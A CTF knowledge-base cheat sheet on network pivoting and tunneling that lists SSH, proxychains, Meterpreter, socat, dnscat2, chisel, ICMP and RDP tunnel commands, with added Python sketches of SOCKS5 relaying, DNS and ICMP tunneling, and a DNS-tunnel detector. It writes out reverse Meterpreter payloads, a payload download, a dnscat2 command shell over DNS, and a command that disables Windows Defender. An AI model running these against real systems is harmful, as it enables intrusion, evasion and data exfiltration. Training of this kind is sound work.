CTF Knowledge Base


Pivoting, Tunneling, and Port Forwarding

Ref: https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding

Enumeration

Command Description
ifconfig Linux command that displays the current network configuration of every interface (ip a on newer systems). A second interface on an internal range is the first sign that a host can be used as a pivot.
ipconfig Windows command that displays the network configuration of every interface.
netstat -r Displays the IPv4 routing table (route print on Windows, ip route on Linux). Routes to networks the attack host cannot reach directly show what a pivot host can get to.
nmap -sT -p22,3306 <IPaddressofTarget> TCP connect scan of the target for open SSH (22) and MySQL (3306) ports.
ss -tl Linux command that lists listening TCP sockets. Services bound only to 127.0.0.1 or to an internal interface show up here and become reachable once a tunnel is in place.

Port Forwarding

Ref: https://academy.hackthebox.com/module/158/section/1426

Command Description
SSH
ssh -L 1234:localhost:3306 ubuntu@<IPaddressofTarget> Local port forward: the SSH client listens on local port 1234 and the SSH server forwards each connection to localhost:3306 from the server's point of view, so a MySQL service bound to 127.0.0.1 on the target becomes reachable from the attack host.
netstat -antp | grep 1234 Shows the listener the tunnel created, filtered on local port 1234.
nmap -v -sV -p1234 localhost Version scan of the forwarded service through local port 1234.
ssh -L 1234:localhost:3306 -L 8080:localhost:80 ubuntu@<IPaddressofTarget> Several forwards in one session: each -L is a separate rule, here local 1234 to the target's MySQL and local 8080 to the target's web server.
ssh -D 9050 ubuntu@<IPaddressofTarget> Dynamic port forward: the SSH client listens on local port 9050 as a SOCKS proxy and forwards every connection sent to it through the target. This is the listener proxychains is pointed at.
ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:80 ubuntu@<IPaddressofTarget> -vN Remote (reverse) port forward: the SSH server on the pivot host listens on <InternalIPofPivotHost>:8080 and forwards each connection back through the tunnel to port 80 on the attack host, so hosts on the internal network can reach a listener on the attack host. Binding to an address other than loopback on the server side requires GatewayPorts yes in the pivot's sshd_config. -N opens no shell, -v prints the forwarding setup.

Proxies

Command Description
tail -4 /etc/proxychains.conf Linux-based command used to display the last 4 lines of /etc/proxychains.conf. Can be used to ensure socks configurations are in place.
proxychains nmap -v -sn 172.16.5.1-200 Sends the traffic of an Nmap scan through proxychains and a SOCKS proxy. -sn is a ping scan (host discovery only, no port scan) with increased verbosity (-v) against 172.16.5.1-200. A SOCKS proxy only carries TCP connections, so ICMP and raw-socket probes never leave the attack host; host discovery through proxychains is unreliable, and -Pn with -sT (next row) is the combination that works.
proxychains nmap -v -Pn -sT 172.16.5.19 Used to send traffic generated by an Nmap scan through Proxychains and a SOCKS proxy. Scan is performed against 172.16.5.19 with increased verbosity (-v), disabling ping discover (-Pn), and using TCP connect scan type (-sT).
proxychains msfconsole Uses Proxychains to open Metasploit and send all generated network traffic through a SOCKS proxy.
proxychains xfreerdp /v:<IPaddressofTarget> /u:victor /p:pass@123 Used to connect to a target using RDP and a set of credentials using proxychains. This will send all traffic through a SOCKS proxy.

Meterpreter

Ref: https://academy.hackthebox.com/module/158/section/1428

Command Description
msf6 > search rdp_scanner Metasploit search that attempts to find a module called rdp_scanner.
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<InternalIPofPivotHost> LPORT=8080 -f exe -o backupscript.exe Uses msfvenom to generate a Windows x64 reverse HTTPS Meterpreter payload that calls back to the pivot host's internal IP (LHOST) on port 8080 (LPORT). The pivot host has to relay that port back to the handler on the attack host (for example with the ssh -R forward or the socat redirector on this page). The payload is written as an executable called backupscript.exe.
msf6 > use exploit/multi/handler Used to select the multi-handler exploit module in Metasploit.
scp backupscript.exe ubuntu@<ipAddressofTarget>:~/ Uses secure copy protocol (scp) to transfer the file backupscript.exe to the specified host and places it in the Ubuntu user's home directory (:~/).
python3 -m http.server 8123 Uses Python3 to start a simple HTTP server listening on port 8123. Can be used to retrieve files from a host.
Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe" PowerShell command used to download a file called backupscript.exe from a webserver (172.16.5.129:8123) and then save the file to location specified after -OutFile.
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IPaddressofAttackHost> LPORT=8080 -f elf -o backupjob Uses msfvenom to generate a Linux x64 reverse TCP Meterpreter payload that calls back to the attack host (LHOST) on port 8080 (LPORT). The payload takes the form of an ELF executable called backupjob.
msf6> run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23 Metasploit command that runs a ping sweep module against the specified network segment (RHOSTS=172.16.5.0/23).
msf6 > use auxiliary/server/socks_proxy Metasploit command that selects the socks_proxy auxiliary module.
msf6 auxiliary(server/socks_proxy) > jobs Metasploit command that lists all currently running jobs.
socks4 127.0.0.1 9050 Line in the [ProxyList] section of /etc/proxychains.conf that points proxychains at a SOCKS4 proxy on 127.0.0.1:9050 (what ssh -D 9050 exposes).
socks5 127.0.0.1 1080 Same for a SOCKS5 proxy on 127.0.0.1:1080 (the default port of the Metasploit socks_proxy module and of chisel's socks option). Leave only the proxy line you are actually using uncommented: in the default strict_chain mode every listed proxy must be reachable or the chain fails.
msf6 > use post/multi/manage/autoroute Metasploit command used to select the autoroute module.

Ping Sweep one-liners

Command Description
for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done Linux for loop that sends one ping to every address in 172.16.5.0/24 and prints only the replies; each ping is backgrounded so the sweep does not wait on timeouts. Run it on the pivot host, since ICMP cannot be pushed through a SOCKS proxy.
for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply" Windows cmd.exe for loop for the same sweep: one echo request (-n 1) with a 100 ms timeout (-w 100) per host, printing only the replies.
1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.16.5.$($_) -quiet)"} PowerShell one-liner that pings 172.16.5.1-254 once each and prints True or False per address.

Meterpreter portforwarding

Command Description
meterpreter > help portfwd Meterpreter command used to display the features of the portfwd command.
meterpreter > portfwd add -l 3300 -p 3389 -r <IPaddressofTarget> Meterpreter-based portfwd command that adds a forwarding rule to the current Meterpreter session. This rule forwards network traffic on port 3300 on the local machine to port 3389 (RDP) on the target.
xfreerdp /v:localhost:3300 /u:victor /p:pass@123 Uses xfreerdp to connect to a remote host through localhost:3300 using a set of credentials. Port forwarding rules must be in place for this to work properly.
netstat -antp Used to display all (-a) active network connections with associated process IDs. -t displays only TCP connections.-n displays only numerical addresses. -p displays process IDs associated with each displayed connection.
meterpreter > portfwd add -R -l 8081 -p 1234 -L <IPaddressofAttackHost> Reverse port forward: the compromised host listens on port 8081 and every connection to it is carried through the Meterpreter session to port 1234 on the attack host (-L is the address to deliver to). Used to give hosts on the internal network a path to a handler on the attack host.
meterpreter > bg Backgrounds the current Meterpreter session and returns to the msf prompt, similar to backgrounding a process in Linux; the session and its portfwd rules stay active.

socat

Socat is a bidirectional relay tool that can create pipe sockets between 2 independent network channels without needing to use SSH tunneling. It acts as a redirector that can listen on one host and port and forward that data to another IP address and port.

Command Description
Ref: https://academy.hackthebox.com/module/158/section/1430
socat TCP4-LISTEN:8080,fork TCP4:<IPaddressofAttackHost>:80 Run on the pivot host: listens on port 8080, forks a child for every incoming connection so the listener keeps accepting, and connects each one to the attack host on port 80. Internal hosts that can only reach the pivot get a path to a listener on the attack host.
socat TCP4-LISTEN:8080,fork TCP4:<IPaddressofTarget>:8443 Run on the pivot host: listens on port 8080 and connects each incoming connection to the target host on port 8443, exposing an internal service to whoever can reach the pivot.
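The following Python is an added example, not code from the page or from socat, OpenSSH, chisel or proxychains. It shows in one place what the tools in the Proxies and socat sections do: _serve with _relay is the listen, fork and connect redirector of socat TCP4-LISTEN:8080,fork TCP4:<ip>:<port>; _socks5_handle is the SOCKS5 CONNECT listener that ssh -D, chisel client ... socks or the Metasploit socks_proxy module expose on the attack host; and socks5_connect is the handshake proxychains performs on a program's behalf (greeting, method selection, CONNECT request, 10-byte reply). Everything binds to 127.0.0.1 on ephemeral ports and the "internal service" is a constructed echo server, so it runs offline. demo(refuse=True) exercises the failure mode where the far end is closed and the proxy answers with reply code 5, which proxychains reports as a failed chain. The function names and the INTERNAL: banner are this example's own choices.

```python
"""Added example, not code from the page, socat, OpenSSH, chisel or proxychains: socat-style
redirector, minimal SOCKS5 CONNECT server and client handshake, all on 127.0.0.1, offline."""
import socket
import struct
import threading
from contextlib import suppress
W = socket.MSG_WAITALL            # block until exactly n bytes arrive on fixed-size reads

def _pump(src, dst):
    # Copy src -> dst until EOF, then half-close dst so its peer sees EOF too.
    with suppress(OSError):
        while (data := src.recv(4096)):
            dst.sendall(data)
    with suppress(OSError):
        dst.shutdown(socket.SHUT_WR)

def _relay(a, b):
    # Bidirectional relay; returns once both directions have reached EOF.
    t = threading.Thread(target=_pump, args=(b, a), daemon=True)
    t.start(); _pump(a, b); t.join()
    a.close(); b.close()

def _serve(handler):
    # Listen on 127.0.0.1:0; every client gets its own thread (socat's ,fork).
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(16)
    def loop():
        while True:
            threading.Thread(target=handler, args=(srv.accept()[0],), daemon=True).start()
    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()

def start_redirector(target):
    """socat TCP4-LISTEN:<port>,fork TCP4:<ip>:<port> equivalent; returns (ip, port)."""
    return _serve(lambda c: _relay(c, socket.create_connection(target)))

def _reject(conn, code):
    conn.sendall(b"\x05" + bytes([code]) + b"\x00\x01" + bytes(6)); conn.close()  # zero BND fields

def _socks5_handle(conn):
    # Greeting: VER=5, NMETHODS, METHODS; only "no authentication" (0x00) is accepted.
    ver, nmethods = conn.recv(2, W)
    if ver != 5 or 0 not in conn.recv(nmethods, W):
        conn.sendall(b"\x05\xff")
        return conn.close()
    conn.sendall(b"\x05\x00")
    # Request: VER CMD RSV ATYP DST.ADDR DST.PORT; only CONNECT (1) to IPv4 (ATYP 1) is handled.
    _ver, cmd, _rsv, atyp = conn.recv(4, W)
    if atyp != 1:
        return _reject(conn, 8)                 # 8 = address type not supported
    host, port = socket.inet_ntoa(conn.recv(4, W)), struct.unpack("!H", conn.recv(2, W))[0]
    if cmd != 1:
        return _reject(conn, 7)                 # 7 = command not supported
    try:
        upstream = socket.create_connection((host, port))
    except OSError:
        return _reject(conn, 5)                 # 5 = connection refused
    bnd_ip, bnd_port = upstream.getsockname()
    conn.sendall(b"\x05\x00\x00\x01" + socket.inet_aton(bnd_ip) + struct.pack("!H", bnd_port))
    _relay(conn, upstream)

def start_socks5_server():
    """What ssh -D, chisel client ... socks or msf socks_proxy expose; returns (ip, port)."""
    return _serve(_socks5_handle)

def socks5_connect(proxy, target):
    """Client side of the handshake. Returns (reply_code, socket); code 0 means connected."""
    s = socket.create_connection(proxy)
    s.sendall(b"\x05\x01\x00")                  # offer "no authentication" only
    if s.recv(2, W) != b"\x05\x00":
        s.close()
        return None, None
    s.sendall(b"\x05\x01\x00\x01" + socket.inet_aton(target[0]) + struct.pack("!H", target[1]))
    code = s.recv(10, W)[1]                     # reply with an IPv4 BND.ADDR is exactly 10 bytes
    if code:
        s.close()
    return code, (s if code == 0 else None)

def _echo_handle(conn):
    # Constructed stand-in for an internal service: banner plus whatever it received.
    conn.sendall(b"INTERNAL:" + b"".join(iter(lambda: conn.recv(4096), b"")))
    conn.close()

def demo(payload=b"hello", refuse=False):
    """client -> SOCKS5 (attack host) -> redirector (pivot) -> internal service.
    refuse=True aims CONNECT at a port nobody listens on to show reply code 5."""
    with socket.socket() as probe:              # bind-and-release gives a closed ephemeral port
        probe.bind(("127.0.0.1", 0))
        closed = probe.getsockname()
    target = closed if refuse else start_redirector(_serve(_echo_handle))
    code, s = socks5_connect(start_socks5_server(), target)
    if code != 0:
        return code, b""
    s.sendall(payload)
    s.shutdown(socket.SHUT_WR)                  # EOF tells the echo server we are done
    out = b"".join(iter(lambda: s.recv(4096), b""))
    s.close()
    return 0, out
```

The half-close in _pump is the detail that matters in a relay: forwarding EOF in each direction separately is what lets a client send its request, shut down its write side and still read the reply, which is also how real redirectors avoid hanging connections. demo(b"ping") returns (0, b"INTERNAL:ping") and demo(refuse=True) returns (5, b"").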

SSH for Windows: plink.exe

Plink, short for PuTTY Link, is a Windows command-line SSH tool that comes as a part of the PuTTY package when installed. Similar to SSH, Plink can also be used to create dynamic port forwards and SOCKS proxies.

Command Description
plink -D 9050 ubuntu@<IPaddressofTarget> Windows-based command that uses PuTTY's Plink.exe to perform SSH dynamic port forwarding and establishes an SSH tunnel with the specified target. This will allow for proxy chaining on a Windows host, similar to what is done with Proxychains on a Linux-based host.

Another Windows-based tool, Proxifier, can use the SOCKS listener that the Plink session opens. Proxifier is a Windows proxy client that routes the traffic of desktop applications through a SOCKS or HTTPS proxy and supports proxy chaining. It is possible to create a profile

SSH Pivoting with Sshuttle

Sshuttle is another tool, written in Python, that removes the need to configure proxychains: it rewrites the local firewall rules (iptables/nftables) so that traffic for the chosen networks is transparently sent through an SSH session to the pivot host. It only pivots over SSH (no Tor or HTTPS proxy option), needs sudo locally for the firewall rules and a Python interpreter on the remote host.

Command Description
sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0/23 -v Runs sshuttle, connects to the pivot host over SSH and routes the 172.16.5.0/23 network through it, so ordinary tools on the attack host reach the internal hosts without proxychains. Give the network in CIDR form; a bare address such as 172.16.5.0 is treated as a single /32 host.

Rpivot

Rpivot is a reverse SOCKS proxy tool written in Python for SOCKS tunneling. Rpivot binds a machine inside a corporate network to an external server and exposes the client's local port on the server-side.

Command Description
sudo git clone https://github.com/klsecservices/rpivot.git Clones the rpivot project GitHub repository.
python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0 Used to run the rpivot server (server.py) on proxy port 9050, server port 9999 and listening on any IP address (0.0.0.0). (attack-host)
scp -r rpivot ubuntu@<IPaddressOfTarget> Uses secure copy protocol to transfer an entire directory and all of its contents to a specified target.
python2.7 client.py --server-ip 10.10.14.18 --server-port 9999 Used to run the rpivot client (client.py) to connect to the specified rpivot server on the appropriate port.(pivot host)
proxychains firefox-esr <IPaddressofTargetWebServer>:80 Opens firefox with Proxychains and sends the web request through a SOCKS proxy server to the specified destination web server.
python client.py --server-ip <IPaddressofTargetWebServer> --server-port 8080 --ntlm-proxy-ip <IPaddressofProxy> --ntlm-proxy-port 8081 --domain <nameofWindowsDomain> --username <username> --password <password> Used to run the rpivot client through an HTTP proxy that requires NTLM authentication, supplying the proxy address and the domain credentials it needs. (pivot host)

netsh

Netsh is a Windows command-line tool that can help with the network configuration of a particular Windows system.

Command Description
netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.42.198 connectport=3389 connectaddress=172.16.5.25 Adds an IPv4-to-IPv4 (v4tov4) portproxy rule on the Windows pivot: connections to 10.129.42.198:8080 are forwarded to 172.16.5.25:3389 (RDP). Needs an administrative prompt, and the rule survives reboots until removed with netsh interface portproxy delete v4tov4.
netsh.exe interface portproxy show v4tov4 Lists the configured IPv4-to-IPv4 portproxy rules.

DNS Tunneling with Dnscat2

Dnscat2 is a tunneling tool that uses the DNS protocol to send data between two hosts. It runs an encrypted command-and-control (C&C or C2) channel over DNS queries and responses, carrying data in record types such as TXT, CNAME and MX. Practically every Active Directory environment has an internal DNS server that resolves internal names and forwards everything else to external resolvers, and with dnscat2 that forwarding path is the channel: the client queries names under a domain the attacker's server is authoritative for, the internal resolver recurses outward on its behalf, and the data leaves the network as ordinary-looking DNS lookups even when no direct outbound connection is allowed. This makes dnscat2 a stealthy way to exfiltrate data and to get past perimeter controls that only inspect or TLS-intercept HTTP(S); it is not invisible to a resolver that logs queries, since the long, high-entropy subdomains and the query volume stand out.

Command Description
git clone https://github.com/iagox86/dnscat2.git Clones the dnscat2 project GitHub repository.
sudo ruby dnscat2.rb --dns host=<attack_box>,port=53,domain=inlanefreight.local --no-cache Used to start the dnscat2.rb server running on the specified IP address, port (53) & using the domain inlanefreight.local with the no-cache option enabled.
git clone https://github.com/lukebaggett/dnscat2-powershell.git Clones the dnscat2-powershell project Github repository.
Import-Module dnscat2.ps1 PowerShell command used to import the dnscat2.ps1 tool.
Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret <secret_from_server> -Exec cmd PowerShell command used to connect to a specified dnscat2 server using a IP address, domain name and preshared secret. The client will send back a shell connection to the server (-Exec cmd).
dnscat2> ? Used to list dnscat2 options.
dnscat2> window -i 1 Used to interact with an established dnscat2 session.
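As an added example (not dnscat2's own code or wire format), the following Python shows the constraints any DNS tunnel has to work within. Data must be encoded into labels of at most 63 characters inside names of at most 253 characters, carried as subdomains of a domain the attacker's server is authoritative for (inlanefreight.local, as in the commands above), and put back in order on arrival, because recursive resolvers may deliver queries out of order. The same properties, many long and high-entropy labels under one domain, are what resolver logs and DNS security products key on, so the last function is the detection side. The sequence-label layout, the base32 choice, the entropy threshold and the 512-byte SAMPLE_PAYLOAD (built from sha256 digests purely to get realistic-looking data) are this example's assumptions.

```python
"""Added example, not dnscat2's code or wire format: packing a payload into DNS query
names within the protocol limits, reassembling it server-side, and the detection side."""
import base64
import hashlib
import math
from collections import Counter

LABEL_MAX = 63            # longest label DNS allows
NAME_MAX = 253            # longest textual name DNS allows
DOMAIN = "inlanefreight.local"
# Constructed 512-byte sample: sha256 digests just to get realistic, high-entropy data.
SAMPLE_PAYLOAD = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(16))

def encode_queries(payload, domain=DOMAIN, seq_width=4):
    """Client side: return the query names carrying payload as <seq>.<labels...>.<domain>.
    Base32 is used because names are case-insensitive and limited to letters, digits and '-'."""
    data = base64.b32encode(payload).decode().rstrip("=").lower()
    # A name is seq + "." + labels joined by "." + "." + domain, so the label characters
    # plus their separating dots must fit in NAME_MAX - len(domain) - seq_width - 1.
    labels_per_name = (NAME_MAX - len(domain) - seq_width - 1) // (LABEL_MAX + 1)
    chunk = labels_per_name * LABEL_MAX
    names = []
    for i in range(0, len(data), chunk):
        piece = data[i:i + chunk]
        labels = [piece[j:j + LABEL_MAX] for j in range(0, len(piece), LABEL_MAX)]
        names.append(".".join([f"{len(names):0{seq_width}x}", *labels, domain]))
    return names

def decode_queries(names, domain=DOMAIN):
    """Authoritative-server side: keep queries under our domain, order them by the
    sequence label (recursive resolvers may deliver them out of order), reassemble, decode."""
    chunks = {}
    for name in names:
        if not name.endswith("." + domain):
            continue                                    # unrelated query, ignore
        seq, *labels = name[: -len(domain) - 1].split(".")
        chunks[int(seq, 16)] = "".join(labels)
    data = "".join(chunks[k] for k in sorted(chunks)).upper()
    return base64.b32decode(data + "=" * (-len(data) % 8))

def label_entropy(label):
    """Shannon entropy in bits per character; ordinary hostnames sit well below 3.5."""
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in Counter(label).values())

def tunnel_suspects(names, domain=DOMAIN, min_label=30, min_entropy=3.5):
    """Defender side, over resolver logs: names under domain whose longest subdomain
    label is both long and high-entropy. Returns the matching names."""
    hits = []
    for name in names:
        if not name.endswith("." + domain):
            continue
        longest = max(name[: -len(domain) - 1].split("."), key=len)
        if len(longest) >= min_label and label_entropy(longest) >= min_entropy:
            hits.append(name)
    return hits

def name_limits_ok(names):
    """True when every name and every label respects the DNS length limits."""
    return all(len(n) <= NAME_MAX and all(len(l) <= LABEL_MAX for l in n.split("."))
               for n in names)
```

With the 19-character domain used here each name carries three 63-character labels, so the 512-byte sample needs five queries; a real tunnel also has to cope with resolvers that cache, retry or lowercase names, which is why dnscat2's server is started with --no-cache above and why the encoding is case-insensitive.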

Chisel

Chisel is a TCP/UDP-based tunneling tool written in Go that uses HTTP to transport data that is secured using SSH. Chisel can create a client-server tunnel connection in a firewall restricted environment.


Preparations for the tool

# Fetch and enter the source tree
git clone https://github.com/jpillora/chisel.git
cd chisel

# Build the binary (set GOOS/GOARCH to match the pivot host, e.g. GOOS=linux GOARCH=amd64 go build)
go build

# Check size of binary
du -hs chisel

# Smaller binary: '-s' strips the symbol table and '-w' drops the DWARF debug info
go build -ldflags='-s -w'

# Compress further with UPX (slower to build, smaller to transfer to the pivot)
upx --brute chisel
Command Description
./chisel server -v -p 1234 --socks5 Run on the pivot host: starts a chisel server in verbose mode listening on port 1234 with a SOCKS5 endpoint available to clients.
./chisel client -v 10.129.202.64:1234 socks Run on the attack host: connects to the chisel server at the given IP and port and opens a local SOCKS5 listener on 127.0.0.1:1080 whose connections exit through the server, so proxychains needs socks5 127.0.0.1 1080. If the pivot cannot accept inbound connections, start the server on the attack host with --reverse and run the client on the pivot with R:socks instead.

ICMP echo tunnel with ptunnel-ng

ICMP tunneling encapsulates traffic in the payload of ICMP echo requests and replies, so it only works where the firewalled network allows the pivot host to be pinged (or to ping out). Because the data rides inside pings, a firewall that permits ICMP but blocks TCP still lets the tunnel through, which is useful both for data exfiltration and for carrying a pivot connection to an external host. Here ptunnel-ng is used to build a tunnel between the Ubuntu pivot host and the attack host: the ptunnel-ng server runs on the pivot host, the client on the attack host, and SSH is then carried inside the ICMP tunnel.

Command Description
git clone https://github.com/utoni/ptunnel-ng.git Clones the ptunnel-ng project GitHub repository.
sudo ./autogen.sh Runs the autogen.sh script that configures and builds ptunnel-ng; the resulting binary is then copied to the pivot host.
sudo ./ptunnel-ng -r10.129.202.64 -R22 Run on the pivot host: starts the ptunnel-ng server, which delivers tunneled traffic to the destination given by -r (here the pivot host's own SSH service) on the port given by -R (22). Root is needed for the raw ICMP socket.
sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22 Run on the attack host: connects to the ptunnel-ng server at -p, listens on local port 2222 (-l2222) and relays whatever arrives there through the ICMP tunnel to -r:-R (10.129.202.64:22). Connecting through local port 2222 is what puts the traffic inside ICMP.
ssh -p2222 -lubuntu 127.0.0.1 Connects to the pivot's SSH service through the local ICMP tunnel endpoint; the SSH session, and any -D or -L forwards opened on it, is now carried inside echo requests and replies.
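The following Python is an added example, not ptunnel-ng's framing or code: it builds and parses the packet an ICMP tunnel actually sends. Each chunk of the tunneled stream becomes the payload of an echo request whose identifier and sequence number let the server match it to a session and put chunks back in order, and the RFC 1071 checksum must be recomputed over the new payload or the packet is discarded before it reaches the tunnel endpoint. The code only produces and verifies packet bytes; sending them needs a raw socket, which is why both ptunnel-ng commands above use sudo. The 1400-byte chunk size and the function names are this example's own choices.

```python
"""Added example, not ptunnel-ng's framing: ICMP echo packets carrying tunneled bytes,
with checksum generation and verification. Builds bytes only; no raw socket is opened."""
import struct

ICMP_ECHO_REQUEST = 8
ICMP_ECHO_REPLY = 0

def icmp_checksum(data):
    """RFC 1071 one's-complement sum over 16-bit words (odd length is zero-padded)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:                       # fold carries back into the low 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def build_icmp_echo(ident, seq, payload, reply=False):
    """Type(1) Code(1) Checksum(2) Identifier(2) Sequence(2), then the tunneled payload.
    ident and seq are what let the tunnel endpoint tie packets to a session and order them."""
    icmp_type = ICMP_ECHO_REPLY if reply else ICMP_ECHO_REQUEST
    header = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)   # checksum field zeroed
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", icmp_type, 0, csum, ident, seq) + payload

def parse_icmp_echo(packet):
    """Return (type, ident, seq, payload), or None when the packet is not a valid echo.
    The checksum over the whole packet, field included, must come out as zero."""
    if len(packet) < 8 or icmp_checksum(packet) != 0:
        return None
    icmp_type, code, _csum, ident, seq = struct.unpack("!BBHHH", packet[:8])
    if icmp_type not in (ICMP_ECHO_REQUEST, ICMP_ECHO_REPLY) or code != 0:
        return None
    return icmp_type, ident, seq, packet[8:]

def tunnel_frames(data, ident, chunk=1400):
    """Tunnel client side: split a byte stream into one echo request per chunk, numbered
    in order, ready to be handed to a raw socket (chunk size is this example's choice)."""
    return [build_icmp_echo(ident, seq, data[i:i + chunk])
            for seq, i in enumerate(range(0, len(data), chunk))]

def reassemble(frames):
    """Tunnel server side: drop frames that fail verification, order by sequence, join."""
    parsed = [p for p in (parse_icmp_echo(f) for f in frames) if p]
    return b"".join(p[3] for p in sorted(parsed, key=lambda p: p[2]))
```

A defender looking for this sees echo requests whose payloads are large, vary from packet to packet and arrive at a steady rate, rather than the fixed 56-byte pattern a normal ping sends; the checksum header in isolation gives nothing away, which is why the payload is what detection has to look at.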

RDP and SOCKS Tunnelling

SocksOverRDP is an example of a tool that uses Dynamic Virtual Channels (DVC) from the Remote Desktop Services feature of Windows. DVCs carry extra data streams over an RDP connection; legitimate uses include clipboard transfer and audio redirection, but the same channel can carry arbitrary packets. SocksOverRDP uses it to tunnel our traffic over the RDP session and exposes it as a SOCKS listener on the RDP client, which Proxifier, a Windows proxy client, then routes applications through.

Command Description
Set-MpPreference -DisableRealtimeMonitoring $true PowerShell command used to disable Windows Defender real-time monitoring, since the SocksOverRDP binaries are commonly flagged. Needs an elevated prompt and is itself a loud, logged action.
regsvr32.exe SocksOverRDP-Plugin.dll Registers the SocksOverRDP plugin DLL on the machine running the RDP client, so that mstsc.exe loads it; the matching SocksOverRDP server component must then be run on the RDP target once the session is established.
netstat -antb | findstr 1080 Windows command used to confirm the SOCKS listener the plugin opened on port 1080; -b (the owning executable) needs an elevated prompt.

Ligolo

Ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptic curve). The proxy and agent commands below belong to its successor Ligolo-ng, which replaces the SOCKS listener with a TUN interface on the attack box, so internal networks are reached through ordinary routes without proxychains.

Command Description
TUN interface on the attack box
sudo ip tuntap add user <user> mode tun ligolo Creates a TUN interface named ligolo on the attack box, owned by <user> so the proxy can use it without running as root.
sudo ip link set ligolo up Brings the ligolo interface up.
Proxy on the attack box
sudo ./proxy -selfcert Starts the proxy server with a self-signed certificate (not recommended outside a lab; the agent must then be started with -ignore-cert).
sudo ./proxy -autocert Starts the proxy server with an automatically obtained TLS certificate.
To use your own certificate and key for the proxy server, pass the -certfile and -keyfile parameters.
Agent on the jump box
./agent -connect <attack_box_ip>:<server_port, default 11601> Starts the agent and connects it back to the proxy; add -ignore-cert when the proxy uses a self-signed certificate.
Inside the proxy console
[Agent : ubuntu@WEB01] » session Lists the connected agents and selects the one to work with.
[Agent : ubuntu@WEB01] » start Starts tunneling traffic through the selected agent.
sudo ip route add <network_to_access> dev ligolo Run on the attack box: routes the internal network (for example 172.16.5.0/23) via the ligolo interface, so ordinary tools reach it directly.
[Agent : ubuntu@WEB01] » listener_add --addr 0.0.0.0:30000 --to 127.0.0.1:10000 --tcp Adds a listener on the agent host: connections to port 30000 there are forwarded back to 127.0.0.1:10000 on the proxy side. This is how a double pivot is built: a second agent deeper in the network connects to the first agent's listener instead of to the attack box directly.
[Agent : ubuntu@WEB01] » listener_list Lists all current listeners.